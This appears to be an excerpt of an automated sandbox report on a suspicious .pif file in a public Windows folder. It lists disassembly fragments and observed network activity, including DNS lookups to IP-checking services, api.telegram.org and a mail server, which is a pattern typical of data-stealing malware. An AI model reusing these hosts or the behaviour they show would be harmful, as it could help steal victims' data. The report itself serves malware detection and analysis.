          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90C9F0h8_2_2C90C6F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90E1D8h8_2_2C90DEE0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9042B6h8_2_2C903FE8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9073E0h8_2_2C9070E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90B208h8_2_2C90AF10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C902BE6h8_2_2C902918
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90DD10h8_2_2C90DA18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C905BF8h8_2_2C905900
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90F4F9h8_2_2C90F200
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C904BD6h8_2_2C904908
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C908700h8_2_2C908408
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90C528h8_2_2C90C230
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C903506h8_2_2C903238
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90F030h8_2_2C90ED38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C906F18h8_2_2C906C20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C909A20h8_2_2C909728
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90D848h8_2_2C90D550
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C903E26h8_2_2C903B58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C906A50h8_2_2C906758
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90030Eh8_2_2C900040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C908238h8_2_2C907F40
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C901516h8_2_2C901248
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90AD40h8_2_2C90AA48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90EB68h8_2_2C90E870
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C904746h8_2_2C904478
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C907D70h8_2_2C907A78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C900C07h8_2_2C900960
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C909558h8_2_2C909260
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C901E36h8_2_2C901B68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90C060h8_2_2C90BD68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C941190h8_2_2C940E98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C940338h8_2_2C940040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C940CC8h8_2_2C9409D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C940800h8_2_2C940508
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then push 00000000h8_2_2C96479F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_2C96003B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_2C960040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_2C960356
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]8_2_2D024C9C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]8_2_2D027AC3
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h14_2_33EFDD08
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 370DF2B5h14_2_370DF0C9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 370DFC3Fh14_2_370DF0C9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_370DE5E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 370DE0C5h14_2_370DE114
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 370DE0C5h14_2_370DDF07
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_370DEDFB
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_370DEC1B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819185Dh14_2_38191440
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381910E9h14_2_38190E38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819DAE9h14_2_3819D840
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819DF41h14_2_3819DC98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819E399h14_2_3819E0F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819E7F1h14_2_3819E548
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819B829h14_2_3819B580
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819EC49h14_2_3819E9A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819BC81h14_2_3819B9D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819F0A1h14_2_3819EDF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819C0D9h14_2_3819BE30
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819F4F9h14_2_3819F250
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819C531h14_2_3819C288
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819F951h14_2_3819F6A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819C989h14_2_3819C6E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819FDA9h14_2_3819FB00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819CDE1h14_2_3819CB38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819D239h14_2_3819CF90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819185Dh14_2_3819178B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3819D691h14_2_3819D3E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A5B61h14_2_381A58B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A7DC0h14_2_381A7AF0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381ABC4Eh14_2_381AB980
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A68FDh14_2_381A65C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AC0DEh14_2_381ABE10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AE0CEh14_2_381ADE00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A48C9h14_2_381A4620
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A1CF9h14_2_381A1A50
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AD31Eh14_2_381AD050
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AF30Eh14_2_381AF040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A02E9h14_2_381A0040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A4D21h14_2_381A4A78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A3311h14_2_381A3068
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AB32Eh14_2_381AB060
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A5709h14_2_381A5460
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A0741h14_2_381A0498
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AE55Eh14_2_381AE290
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AA57Eh14_2_381AA2B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A2151h14_2_381A1EA8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AC56Eh14_2_381AC2A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A517Bh14_2_381A4ED0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AF79Eh14_2_381AF4D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A3769h14_2_381A34C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A0B99h14_2_381A08F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AB7BEh14_2_381AB4F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AD7AEh14_2_381AD4E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A3BC1h14_2_381A3918
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A5FB9h14_2_381A5D10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AC9FEh14_2_381AC730
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AE9EEh14_2_381AE720
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A0FF1h14_2_381A0D48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AAA0Eh14_2_381AA740
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A701Ah14_2_381A6F70
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A4019h14_2_381A3D70
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381ADC3Eh14_2_381AD970
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A6411h14_2_381A6168
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A701Ah14_2_381A6F69
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AFC2Eh14_2_381AF960
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov esp, ebp14_2_381A9B90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AEE7Eh14_2_381AEBB0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A1449h14_2_381A11A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381AAE9Eh14_2_381AABD0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A4471h14_2_381A41C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381ACE8Eh14_2_381ACBC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 381A18A1h14_2_381A15F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38219A20h14_2_38219728
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38215730h14_2_38215438
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38216F18h14_2_38216C20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821C528h14_2_3821C230
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38213506h14_2_38213238
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821F030h14_2_3821ED38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38215BF8h14_2_38215900
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821F4F9h14_2_3821F200
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38214BD6h14_2_38214908
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38218700h14_2_38218408
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821B208h14_2_3821AF10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38212BE6h14_2_38212918
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821DD10h14_2_3821DA18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38210C07h14_2_38210960
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38219558h14_2_38219260
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38211E36h14_2_38211B68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821C060h14_2_3821BD68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821EB68h14_2_3821E870
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38214746h14_2_38214478
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38217D70h14_2_38217A78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821030Eh14_2_38210040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38218238h14_2_38217F40
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38211516h14_2_38211248
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821AD40h14_2_3821AA48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821D848h14_2_3821D550
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38213E26h14_2_38213B58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38216A50h14_2_38216758
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821BB98h14_2_3821B8A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38213076h14_2_38212DA8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821E6A0h14_2_3821E3A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382178A8h14_2_382175B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38211086h14_2_38210DB8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821A3B0h14_2_3821A0B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821A878h14_2_3821A580
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38212756h14_2_38212488
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821D380h14_2_3821D088
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38216588h14_2_38216290
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38215107h14_2_38214D98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38219090h14_2_38218D98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821E1D8h14_2_3821DEE0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382142B6h14_2_38213FE8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382173E0h14_2_382170E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38219EE8h14_2_38219BF0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382122C6h14_2_38211FF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821C9F0h14_2_3821C6F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821CEB8h14_2_3821CBC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38213997h14_2_382136C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382160C0h14_2_38215DC8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821F9C0h14_2_3821F6C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821079Eh14_2_382104D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38218BC8h14_2_382188D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 382119A6h14_2_382116D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 3821B6D0h14_2_3821B3D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38251190h14_2_38250E98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38250338h14_2_38250040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38250800h14_2_38250508
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 38250CC8h14_2_382509D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_38270038
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_38270040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_38270356
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then push 00000000h14_2_3827479F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]14_2_38937AC7
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]14_2_38934C9C
          Source: global traffic DNS query: name: amazonenviro.com
          Source: global traffic DNS query: name: checkip.dyndns.org
          Source: global traffic DNS query: name: reallyfreegeoip.org
          Source: global traffic DNS query: name: api.telegram.org
          Source: global traffic DNS query: name: mail.irco.com.sa
          Source: global traffic DNS query: name: reallyfreegeoip.org
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 166.62.27.188:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49754 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49755 -> 188.114.96.3:443
